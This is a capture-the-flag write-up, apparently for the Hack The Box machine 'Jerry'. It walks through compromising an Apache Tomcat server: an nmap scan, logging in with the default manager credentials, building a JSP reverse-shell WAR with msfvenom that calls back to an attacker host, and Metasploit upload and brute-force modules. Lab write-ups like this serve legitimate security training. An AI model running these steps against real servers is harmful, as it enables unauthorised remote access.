Let’s scan the IP we have with nmap to enumerate the ports and services.
sudo nmap -sS -sC -sV -oA jerry 10.10.10.95
We have port 8080 open and it’s running Apache Tomcat.
Going to the page shows the default page. Something we see is: “If you’re seeing this, you’ve successfully installed Tomcat. Congratulations!”. This means it’s probably a fresh install.
Choosing “Server Status”, “Manager App” or “Host Manager” will bring up a login popup and if you cancel out of it you will be redirected.
We see the credentials tomcat:s3cret
And you get logged in.
There is an option to deploy WAR files.
Generate a WAR payload with msfvenom.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.X.X LPORT=9001 -f war > shell.war
Once that’s done you can select your shell and deploy it.
When it’s uploaded you will see it in the list of applications.
Reload it, fire up a netcat listener and then navigate to /shell.
You should receive a connection as NT AUTHORITY\SYSTEM.
Navigating to the Administrator folder we see a “flags” directory.
We get two flags at the price of one ¯\_(ツ)_/¯
You can also go through the box with metasploit. Start metasploit.
msfconsole
And search for “tomcat”
We see authenticated upload code execution. Select it and set the options.
I set the HttpPassword, HttpUsername, RHOSTS and RPORT. Run it and you should get a meterpreter shell.
We can pop a shell and we would be running as Administrator.
If you did not try and login in the manager page to find the credentials there is a metasploit module that would have found the username and password. It is “auxiliary/scanner/http/tomcat_mgr_login”. We select it and set the options. In this case it would be only the target IP.
Running the exploit tries to brute-force the login page.
Eventually it will find the password.
That was pretty much it for Jerry. I hope you enjoyed the machine and the writeup. Cya around.
